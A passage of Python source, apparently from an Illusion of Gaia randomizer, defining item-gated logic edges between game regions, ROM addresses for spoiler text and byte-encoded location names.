601: [False, [], 0, [0,0,0,b"\x00"], 0, "Glitches ", [], False, [], [], [], [], [], [], [], []],
602: [False, [], 0, [0,0,0,b"\x00"], 0, "Early Firebird ", [], False, [], [], [], [], [], [], [], []],
INACCESSIBLE: [False, [], 0, [0,0,0,b"\x00"], 0, "Inaccessible", [], False, [], [], [], [], [], [], [], []]
}
# Define logical paths in dynamic graph
# Format: { ID: [Status(-1=restricted,0=locked,1=unlocked,2=forced_open), StartRegion, DestRegion, NeedFreedan, [[item1, qty1],[item2,qty2]...]]}
self.logic = {
# Jeweler Rewards
0: [0, 1, 2, False, [[1, gem[0]]]], # Jeweler Reward 1
1: [0, 1, 2, False, [[1, gem[0] - 2], [41, 1]]],
2: [0, 1, 2, False, [[1, gem[0] - 3], [42, 1]]],
3: [0, 1, 2, False, [[1, gem[0] - 5], [41, 1], [42, 1]]],
4: [0, 2, 3, False, [[1, gem[1]]]], # Jeweler Reward 2
5: [0, 2, 3, False, [[1, gem[1] - 2], [41, 1]]],
6: [0, 2, 3, False, [[1, gem[1] - 3], [42, 1]]],
7: [0, 2, 3, False, [[1, gem[1] - 5], [41, 1], [42, 1]]],
8: [0, 3, 4, False, [[1, gem[2]]]], # Jeweler Reward 3
9: [0, 3, 4, False, [[1, gem[2] - 2], [41, 1]]],
10: [0, 3, 4, False, [[1, gem[2] - 3], [42, 1]]],
11: [0, 3, 4, False, [[1, gem[2] - 5], [41, 1], [42, 1]]],
12: [0, 4, 5, False, [[1, gem[3]]]], # Jeweler Reward 4
13: [0, 4, 5, False, [[1, gem[3] - 2], [41, 1]]],
14: [0, 4, 5, False, [[1, gem[3] - 3], [42, 1]]],
15: [0, 4, 5, False, [[1, gem[3] - 5], [41, 1], [42, 1]]],
16: [0, 5, 6, False, [[1, gem[4]]]], # Jeweler Reward 5
17: [0, 5, 6, False, [[1, gem[4] - 2], [41, 1]]],
18: [0, 5, 6, False, [[1, gem[4] - 3], [42, 1]]],
19: [0, 5, 6, False, [[1, gem[4] - 5], [41, 1], [42, 1]]],
20: [0, 6, 7, False, [[1, gem[5]]]], # Jeweler Reward 6
21: [0, 6, 7, False, [[1, gem[5] - 2], [41, 1]]],
22: [0, 6, 7, False, [[1, gem[5] - 3], [42, 1]]],
23: [0, 6, 7, False, [[1, gem[5] - 5], [41, 1], [42, 1]]],
24: [0, 7, 8, False, [[1, gem[6]]]], # Jeweler Reward 7 (Mansion)
25: [0, 7, 8, False, [[1, gem[6] - 2], [41, 1]]],
26: [0, 7, 8, False, [[1, gem[6] - 3], [42, 1]]],
27: [0, 7, 8, False, [[1, gem[6] - 5], [41, 1], [42, 1]]],
# Inter-Continental Travel
30: [0, 28, 15, False, [[37, 1]]], # South Cape: Erik w/ Lola's Letter
31: [0, 102, 15, False, [[37, 1]]], # Coast: Turbo w/ Lola's Letter
32: [0, 280, 15, False, [[37, 1]]], # Watermia: Bridgeman w/ Lola's Letter
33: [0, 160, 161, False, [[13, 1]]], # Neil's: Neil w/ Memory Melody
34: [0, 314, 17, False, [[505, 1]]], # Euro: Neil w/ Memory restored
35: [0, 402, 17, False, [[505, 1]]], # Dao: Neil w/ Memory restored
36: [0, 60, 64, False, [[25, 1]]], # Moon Tribe healed w/ Teapot
37: [0, 170, 16, False, [[502, 1]]], # Sky Garden: Spirits w/ spirits healed
38: [0, 280, 288, False, [[24, 1]]], # Watermia: Stablemaster w/ Will
39: [0, 310, 311, False, [[24, 1]]], # Euro: Stablemaster w/ Will
40: [0, 350, 351, False, [[10, 1]]], # Natives': Child Guide w/ Large Roast
# Edward's / Tunnel
60: [0, 32, 33, False, [[2, 1]]], # Escape cell w/Prison Key
61: [0, 33, 32, False, [[2, 1]]], # Enter cell w/Prison Key
62: [0, 45, 46, False, [[501, 1]]], # Progression w/ Lilly
63: [0, 47, 48, True, []], # Activate Bridge w/ Freedan
# Itory
70: [0, 50, 51, False, [[9, 1]]], # Town appears w/ Lola's Melody
71: [0, 55, 59, False, [[23, 1]]], # Get Lilly w/ Necklace
72: [0, 56, 57, False, [[61, 1]]], # Cave w/ Psycho Dash
73: [0, 56, 57, False, [[62, 1]]], # Cave w/ Psycho Slide
74: [0, 56, 57, False, [[63, 1]]], # Cave w/ Spin Dash
# Moon Tribe
80: [0, 61, 62, False, [[61, 1]]], # Cave challenge w/ Psycho Dash
81: [0, 61, 62, False, [[62, 1]]], # Cave challenge w/ Psycho Slide
82: [0, 61, 62, False, [[63, 1]]], # Cave challenge w/ Spin Dash
# Inca / Gold Ship / Freejia
89: [0, 72, 99, False, [[601, 1]]], # Map 29 progression w/ glitches
90: [0, 77, 78, False, [[3, 1], [4, 1]]], # Map 30 progression w/ Inca Statues
91: [0, 80, 81, False, [[61, 1]]], # Map 32 progression w/ Psycho Dash
92: [0, 80, 81, False, [[62, 1]]], # Map 32 progression w/ Psycho Slider
93: [0, 80, 81, False, [[63, 1]]], # Map 32 progression w/ Spin Dash
94: [0, 85, 86, True, []], # Map 35 progression w/ Freedan
95: [0, 87, 88, False, [[8, 1]]], # Map 36 progression w/ Wind Melody
96: [0, 89, 90, False, [[7, 1]]], # Map 37 progression w/ Diamond Block
97: [0, 91, 92, False, [[61, 1]]], # Map 38 progression w/ Psycho Dash
98: [0, 91, 92, False, [[62, 1]]], # Map 38 progression w/ Psycho Slider
99: [0, 91, 92, False, [[63, 1]]], # Map 38 progression w/ Spin Dash
#100: [0, 100, 104, False, [[100, 1]]], # Gold Ship progression w/ Statue 1
101: [0, 110, 115, False, [[504, 1]]], # Freejia: Slaver item w/ Laborer Found
# Diamond Mine
110: [0, 131, 132, False, [[61, 1]]], # Map 61 false wall w/ Psycho Dash
111: [0, 131, 132, False, [[62, 1]]], # Map 61 false wall w/ Psycho Slider
112: [0, 131, 132, False, [[63, 1]]], # Map 61 false wall w/ Spin Dash
113: [0, 134, 135, False, [[15, 1]]], # Map 63 progression w/ Elevator Key
114: [0, 136, 137, False, [[61, 1]]], # Map 64 trapped laborer w/ Psycho Dash
115: [0, 136, 137, False, [[62, 1]]], # Map 64 trapped laborer w/ Psycho Slider
116: [0, 136, 137, False, [[63, 1]]], # Map 64 trapped laborer w/ Spin Dash
117: [0, 138, 139, False, [[63, 1]]], # Map 65 progression w/ Spin Dash
118: [0, 138, 139, True, [[64, 1]]], # Map 65 progression w/ Dark Friar
119: [0, 146, 147, False, [[11, 1], [12, 1]]], # Map 68 progression w/ mine keys
# Sky Garden
130: [0, 170, 171, False, [[14, 4]]], # Boss access w/ Crystal Balls
131: [0, 177, 178, True, [[64, 1]]], # Map 79 progression w/ Dark Friar
132: [0, 177, 178, True, [[67, 1]]], # Map 79 progression w/ Firebird
133: [0, 168, 182, False, [[506, 1]]], # Map 81 progression w/ switch 1
134: [0, 182, 183, False, [[507, 1]]], # Map 81 progression w/ switch 2
135: [0, 182, 184, False, [[61, 1]]], # Map 81 progression w/ Psycho Dash
136: [0, 182, 184, False, [[62, 1]]], # Map 81 progression w/ Psycho Dash
137: [0, 182, 184, False, [[63, 1]]], # Map 81 progression w/ Psycho Dash
138: [0, 184, 185, False, [[508, 1], [61, 1]]], # Map 81 progression w/ switch 3 & Psycho Dash
139: [0, 184, 185, False, [[508, 1], [62, 1]]], # Map 81 progression w/ switch 3 & Psycho Slider
140: [0, 184, 185, False, [[508, 1], [63, 1]]], # Map 81 progression w/ switch 3 & Spin Dash
141: [0, 181, 182, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
142: [0, 181, 184, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
143: [0, 182, 185, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
144: [0, 188, 189, True, []], # Map 82 progression w/ Freedan
145: [0, 188, 189, False, [[601, 1]]], # Map 82 progression w/ Glitches
146: [0, 192, 190, False, [[63, 1]]], # Map 83 progression w/ Spin Dash
147: [0, 195, 199, True, [[64, 1]]], # Map 84 progression w/ Dark Friar
148: [0, 195, 199, True, [[67, 1]]], # Map 84 progression w/ Firebird
149: [0, 195, 199, True, [[65, 1]]], # Map 84 progression w/ Aura Barrier
150: [0, 197, 199, True, [[64, 1]]], # Map 84 progression w/ Dark Friar
151: [0, 197, 199, True, [[67, 1]]], # Map 84 progression w/ Firebird
152: [0, 170, 16, False, [[502, 1]]], # Moon Tribe passage w/ spirits healed
# Seaside Palace
160: [0, 205, 208, False, [[501, 1]]], # Coffin access w/ Lilly
161: [0, 209, 510, False, [[17, 1]]], # Purify fountain w/stone
162: [0, 200, 206, False, [[510, 1]]], # Buffy access w/ purified fountain
163: [0, 200, 201, False, [[16, 1]]], # Seaside to Mu w/ Mu key
164: [0, 210, 211, False, [[16, 1]]], # Mu to Seaside w/ Mu key
# Mu
170: [0, 212, 245, False, [[62, 1]]], # Map 95 progression w/ Psycho Slider
171: [0, 212, 213, False, [[511, 1]]], # Map 95 progression w/ water lowered 1
172: [0, 213, 215, False, [[512, 1]]], # Map 95 progression w/ water lowered 2
173: [0, 214, 216, False, [[512, 1]]], # Map 95 progression w/ water lowered 2
174: [0, 217, 218, False, [[511, 1]]], # Map 96 progression w/ water lowered 1
175: [0, 222, 221, True, [[511, 1], [64, 1]]], # Map 97 progression w/ water lowered 1 & Friar
176: [0, 222, 221, True, [[511, 1], [67, 1]]], # Map 97 progression w/ water lowered 1 & Firebird
177: [0, 222, 221, False, [[511, 1], [601, 1]]], # Map 97 progression w/ water lowered 1 & glitches
178: [0, 226, 227, False, [[511, 1]]], # Map 98 progression w/ water lowered 1
179: [0, 227, 229, False, [[512, 1]]], # Map 98 progression w/ water lowered 2
180: [0, 228, 230, False, [[512, 1]]], # Map 98 progression w/ water lowered 2
181: [0, 229, 230, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
182: [0, 230, 229, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
183: [0, 226, 246, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
184: [0, 237, 238, False, [[62, 1]]], # Map 101 progression w/ Psycho Slider
185: [0, 240, 241, False, [[19, 2]]], # Map 102 progression w/ Rama Statues
186: [0, 231, 247, False, [[18, 1]]], # Water lowered 1 w/ Hope Statue
187: [0, 232, 248, False, [[18, 2]]], # Water lowered 2 w/ Hope Statues
# Angel Dungeon
210: [0, 263, 264, False, [[62, 1]]], # Map 112 progression w/ Psycho Slider
211: [0, 265, 275, False, [[62, 1]]], # Map 112 backwards progression w/ Psycho Slider
212: [0, 267, 268, False, [[62, 1]]], # Map 114 progression w/ Psycho Slider
213: [0, 277, 276, False, [[62, 1]]], # Map 114 backwards progression w/ Psycho Slider
214: [0, 272, 273, False, [[513, 1]]], # Ishtar's chest w/ puzzle complete
# Great Wall
220: [0, 294, 295, False, [[601, 1]]], # Map 133 progression w/ glitches
221: [0, 296, 295, False, [[63, 1]]], # Map 133 progression w/ Spin Dash
222: [0, 296, 295, True, []], # Map 133 progression w/ Freedan
223: [0, 298, 299, True, [[64, 1]]], # Map 135 progression w/ Friar
224: [0, 298, 299, True, [[67, 1]]], # Map 135 progression w/ Firebird
225: [0, 299, 298, False, [[64, 1], [54, 2]]], # Map 135 progression w/ Friar III
227: [0, 300, 301, False, [[63, 1]]], # Map 136 progression w/ Spin Dash
228: [0, 295, 294, False, [[63, 1]]], # Map 133 progression w/ Spin Dash
# Euro
230: [0, 314, 315, False, [[40, 1]]], # Ann item w/ Apple
# Mt. Temple
240: [0, 331, 332, False, [[63, 1]]], # Map 161 progression w/ Spin Dash
241: [0, 332, 331, False, [[63, 1]]], # Map 161 backwards progression w/ Spin Dash
242: [0, 333, 514, False, [[26, 1]]], # Map 162 progression w/ Mushroom drops 1
243: [0, 335, 514, False, [[26, 1]]], # Map 162 progression w/ Mushroom drops 1 -- IS THIS TRUE?
244: [0, 339, 515, False, [[26, 2]]], # Map 162 progression w/ Mushroom drops 2
245: [0, 340, 515, False, [[26, 2]]], # Map 162 progression w/ Mushroom drops 2 -- IS THIS TRUE?
246: [0, 340, 516, False, [[26, 3]]], # Map 162 progression w/ Mushroom drops 3
247: [0, 341, 516, False, [[26, 3]]], # Map 162 progression w/ Mushroom drops 3 -- IS THIS TRUE?
# Natives'
250: [0, 353, 354, False, [[29, 1]]], # Statues awake w/ Gorgon Flower
# Ankor Wat
260: [-1, 361, 362, True, [[64, 1]]], # Map 177 progression w/ Friar
261: [0, 363, 364, False, [[63, 1]]], # Map 178 progression w/ Spin Dash
262: [0, 364, 365, False, [[62, 1]]], # Map 178 progression w/ Psycho Slider
263: [0, 365, 364, False, [[62, 1]]], # Map 178 progression w/ Psycho Slider
264: [0, 367, 366, False, [[63, 1]]], # Map 179 progression w/ Spin Dash
265: [0, 369, 370, False, [[62, 1]]], # Map 181 progression w/ Psycho Slider
266: [0, 370, 371, False, [[63, 1]]], # Map 181 progression w/ Spin Dash
267: [0, 373, 374, True, [[66, 1]]], # Map 183 progression w/ Earthquaker
268: [0, 373, 374, True, [[64, 1], [54, 2]]], # Map 183 progression w/ upgraded Friar
269: [0, 373, 374, True, [[64, 1], [601, 1]]], # Map 183 progression w/ Friar and glitches
270: [0, 373, 374, True, [[67, 1]]], # Map 183 progression w/ Firebird -- IS THIS TRUE?
271: [0, 376, 377, True, [[64, 1]]], # Map 184 progression w/ Friar
272: [0, 376, 377, True, [[36, 1]]], # Map 184 progression w/ Shadow
273: [0, 384, 392, False, [[28, 1]]], # Map 188 progression w/ Black Glasses
274: [0, 385, 393, False, [[28, 1]]], # Map 188 progression w/ Black Glasses
275: [0, 384, 392, False, [[601, 1]]], # Map 188 progression w/ glitches
276: [0, 385, 393, False, [[601, 1]]], # Map 188 progression w/ glitches
277: [0, 392, 393, False, [[62, 1]]], # Map 188 progression w/ Slider
278: [0, 393, 392, False, [[62, 1]]], # Map 188 progression w/ Slider
279: [0, 386, 387, False, [[62, 1]]], # Map 188 progression w/ Psycho Slider
280: [0, 387, 386, False, [[62, 1]]], # Map 188 progression w/ Psycho Slider
# Pyramid
290: [0, 410, 411, False, [[62, 1]]], # Map 204 progression w/ Slider
291: [0, 410, 411, False, [[63, 1]]], # Map 204 progression w/ Spin
292: [0, 410, 411, False, [[601, 1]]], # Map 204 progression w/ glitches
293: [0, 411, 412, False, [[36, 1]]], # Map 204 progression w/ Aura
294: [0, 411, 413, False, [[36, 1]]], # Map 204 progression w/ Aura
295: [0, 415, 449, False, [[30, 1], [31, 1], [32, 1], [33, 1], [34, 1], [35, 1], [38, 1]]],
# Boss door open w/ Hieroglyphs
296: [0, 416, 417, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
297: [0, 417, 416, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
298: [0, 418, 419, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
299: [0, 419, 418, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
300: [0, 426, 427, True, [[36, 1]]], # Map 212 progression w/ Aura
301: [0, 426, 427, True, [[66, 1]]], # Map 212 progression w/ Earthquaker
302: [0, 427, 428, True, [[36, 1]]], # Map 212 progression w/ Aura
303: [0, 427, 429, True, [[36, 1]]], # Map 212 progression w/ Aura
304: [0, 427, 429, True, [[66, 1]]], # Map 212 progression w/ Earthquaker
305: [0, 431, 432, False, [[63, 1]]], # Map 214 progression w/ Spin Dash
306: [0, 431, 434, True, [[36, 1]]], # Map 214 progression w/ Aura
307: [0, 431, 433, True, [[64, 1]]], # Map 214 progression w/ Friar
308: [0, 438, 439, False, [[63, 1]]], # Map 217 progression w/ Spin Dash
309: [0, 439, 438, False, [[63, 1]]], # Map 217 progression w/ Spin Dash
310: [0, 440, 441, False, [[63, 1]]], # Map 219 progression w/ Spin Dash
311: [0, 441, 440, False, [[63, 1]]], # Map 219 progression w/ Spin Dash
312: [0, 435, 450, False, [[6, 6], [50, 2], [51, 1], [52, 1]]],
# Killer 6 w/ herbs and upgrades
313: [0, 435, 450, True, [[64, 1], [54, 1]]],
# Killer 6 w/ Friar II
314: [0, 411, 414, False, [[517, 1]]], # Pyramid to boss w/hieroglyphs placed
# Babel / Mansion
320: [0, 461, 462, False, [[36, 1], [39, 1]]], # Map 219 progression w/ Aura and Ring
321: [0, 473, 479, False, [[522, 1]]], # Olman statue w/ Mummy Queen 2
322: [0, 473, 479, False, [[523, 1]]], # Olman statue w/ Solid Arm
323: [0, 480, 481, False, [[62, 1]]], # Mansion progression w/ Slider
# Endgame / Misc
400: [-1, 49, 490, False, [[20, 1]]], # Rescue Kara from Edward's w/ Magic Dust
401: [-1, 150, 490, False, [[20, 1]]], # Rescue Kara from Mine w/ Magic Dust
402: [-1, 270, 490, False, [[20, 1]]], # Rescue Kara from Angel w/ Magic Dust
403: [-1, 345, 490, False, [[20, 1]]], # Rescue Kara from Mt. Temple w/ Magic Dust
404: [-1, 391, 490, False, [[20, 1]]], # Rescue Kara from Ankor Wat w/ Magic Dust
405: [0, 490, 491, False, [[36, 1], [39, 1], [602, 1]]], # Early Firebird w/ Kara, Aura and Ring
406: [0, 490, 492, False, [[36, 1], [100, 0], [101, 0], [102, 0], [103, 0], [104, 0], [105, 0]]],
# Beat Game w/Mystic Statues and Aura
407: [0, 490, 492, False, [[36, 1], [106, self.statues_required]]] # Beat Game w/Mystic Statues and Aura (player choice variant)
}
# Define addresses for in-game spoiler text
self.spoiler_addresses = {
0: "4caf5", # Edward's Castle guard, top floor (4c947)
1: "4e9ff", # Itory elder (4e929)
2: "58ac0", # Gold Ship queen (589ff)
3: "5ad6b", # Man at Diamond Coast (5ab5c)
# 4: "5bfde", # Freejia laborer (5bfaa)
5: "69167", # Seaside Palace empty coffin (68feb)
6: "6dc97", # Ishtar's apprentice (6dc50)
7: "79c81", # Watermia, Kara's journal (79bf5)
8: "7d892", # Euro: Erasquez (7d79e)
9: "89b2a", # Ankor Wat, spirit (89abf)
10: "8ad0c", # Dao: girl with note (8acc5)
11: "99b8f" # Babel: spirit (99b2e)
}
# Define location text for in-game format
self.location_text = {
0: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
1: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
2: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
3: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
4: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
5: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
6: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
7: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
8: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
9: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
10: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
11: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x42\x80\xa3\xa4\x8b\x84", # "Edward's Castle"
12: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x42\x80\xa3\xa4\x8b\x84", # "Edward's Castle"
13: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x60\xa2\x88\xa3\x8e\x8d", # "Edward's Prison"
14: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x60\xa2\x88\xa3\x8e\x8d", # "Edward's Prison"
15: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
16: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
17: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
18: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
19: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
20: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
21: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
22: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
23: b"\x4c\x8e\x8e\x8d\xac\x64\xa2\x88\x81\x84", # "Moon Tribe"
24: b"\x48\x8d\x82\x80", # "Inca"
25: b"\x48\x8d\x82\x80", # "Inca"
26: b"\x48\x8d\x82\x80", # "Inca"
27: b"\x48\x8d\x82\x80", # "Inca"
28: b"\x63\x88\x8d\x86\x88\x8d\x86\xac\xa3\xa4\x80\xa4\xa5\x84", # "Singing Statue"
29: b"\x48\x8d\x82\x80", # "Inca"
30: b"\x48\x8d\x82\x80", # "Inca"
31: b"\x48\x8d\x82\x80", # "Inca"
32: b"\x46\x8e\x8b\x83\xac\x63\x87\x88\xa0", # "Gold Ship"
33: b"\xd6\x0e\x42\x8e\x80\xa3\xa4", # "Diamond Coast"
34: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
35: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
36: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
37: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
38: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
39: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
40: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
41: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
42: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
43: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
44: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
45: b"\x63\x80\x8c", # "Sam"
46: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
47: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
48: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
49: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
50: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
51: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
52: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
53: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
54: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
55: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
56: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
57: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
58: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
59: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
60: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
61: b"\xd7\x32\xd7\x93", # "Seaside Palace"
62: b"\xd7\x32\xd7\x93", # "Seaside Palace"
63: b"\xd7\x32\xd7\x93", # "Seaside Palace"
64: b"\x41\xa5\x85\x85\xa9", # "Buffy"
65: b"\x42\x8e\x85\x85\x88\x8d", # "Coffin"
66: b"\xd7\x32\xd7\x93", # "Seaside Palace"
67: b"\x4c\xa5", # "Mu"
68: b"\x4c\xa5", # "Mu"
69: b"\x4c\xa5", # "Mu"
70: b"\x4c\xa5", # "Mu"
71: b"\x4c\xa5", # "Mu"
72: b"\x4c\xa5", # "Mu"
73: b"\x4c\xa5", # "Mu"
74: b"\x4c\xa5", # "Mu"
75: b"\x4c\xa5", # "Mu"
76: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
77: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
78: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
79: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
80: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
81: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
82: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
83: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
84: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
85: b"\x4b\x80\x8d\x82\x84", # "Lance"
86: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
87: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
88: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
89: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
90: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
91: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
92: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
93: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
94: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
95: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
96: b"\x44\xa5\xa2\x8e", # "Euro"
97: b"\x44\xa5\xa2\x8e", # "Euro"
98: b"\x44\xa5\xa2\x8e", # "Euro"
99: b"\x44\xa5\xa2\x8e", # "Euro"
100: b"\x44\xa5\xa2\x8e", # "Euro"
101: b"\x44\xa5\xa2\x8e", # "Euro"
102: b"\x40\x8d\x8d", # "Ann"
103: b"\x44\xa5\xa2\x8e", # "Euro"
104: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
105: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
106: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
107: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
108: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3\xac\x6e\x84\x8d\x83\x6f", # "Mt. Kress (end)"
109: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
110: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
111: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
112: b"\xd7\x21\x66\x88\x8b\x8b\x80\x86\x84", # "Native Village"
113: b"\x63\xa4\x80\xa4\xa5\x84", # "Statue"
114: b"\xd7\x21\x66\x88\x8b\x8b\x80\x86\x84", # "Native Village"
115: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
116: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
117: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
118: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
119: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
120: b"\x63\x87\xa2\xa5\x81\x81\x84\xa2", # "Shrubber"
121: b"\x63\xa0\x88\xa2\x88\xa4", # "Spirit"
122: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
123: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
124: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
125: b"\x43\x80\x8e", # "Dao"
126: b"\x43\x80\x8e", # "Dao"
127: b"\x43\x80\x8e", # "Dao"
128: b"\x63\x8d\x80\x8a\x84\xac\x86\x80\x8c\x84", # "Snake Game"
129: b"\x43\x80\x8e", # "Dao"
130: b"\x46\x80\x88\x80", # "Gaia"
131: b"\xd6\x3f", # "Pyramid"
132: b"\xd6\x3f", # "Pyramid"
133: b"\xd6\x3f", # "Pyramid"
134: b"\xd6\x3f", # "Pyramid"
135: b"\xd6\x3f", # "Pyramid"
136: b"\x4a\x88\x8b\x8b\x84\xa2\xac\x26", # "Killer 6"
137: b"\xd6\x3f", # "Pyramid"
138: b"\xd6\x3f", # "Pyramid"
139: b"\xd6\x3f", # "Pyramid"
140: b"\xd6\x3f", # "Pyramid"
141: b"\xd6\x3f", # "Pyramid"
142: b"\xd6\x3f", # "Pyramid"
143: b"\x41\x80\x81\x84\x8b", # "Babel"
144: b"\x41\x80\x81\x84\x8b", # "Babel"
145: b"\x41\x80\x81\x84\x8b", # "Babel"
146: b"\x41\x80\x81\x84\x8b", # "Babel"
147: b"\x49\x84\xa7\x84\x8b\x84\xa2\x0e\xa3\xac\x4c\x80\x8d\xa3\x88\x8e\x8d", # "Jeweler's Mansion"
148: "", # "Castoth"
149: "", # "Viper"
150: "", # "Vampires"
151: "", # "Sand Fanger"
152: "", # "Mummy Queen"
153: "" # "Olman"
}
# Define long item text for in-game format
self.item_text_long = {
0: b"\xd3\xd6\x1d\x8d\x8e\xa4\x87\x88\x8d\x86\x4f\xac\xac\xac\xac\xac\xac\xac\xac",
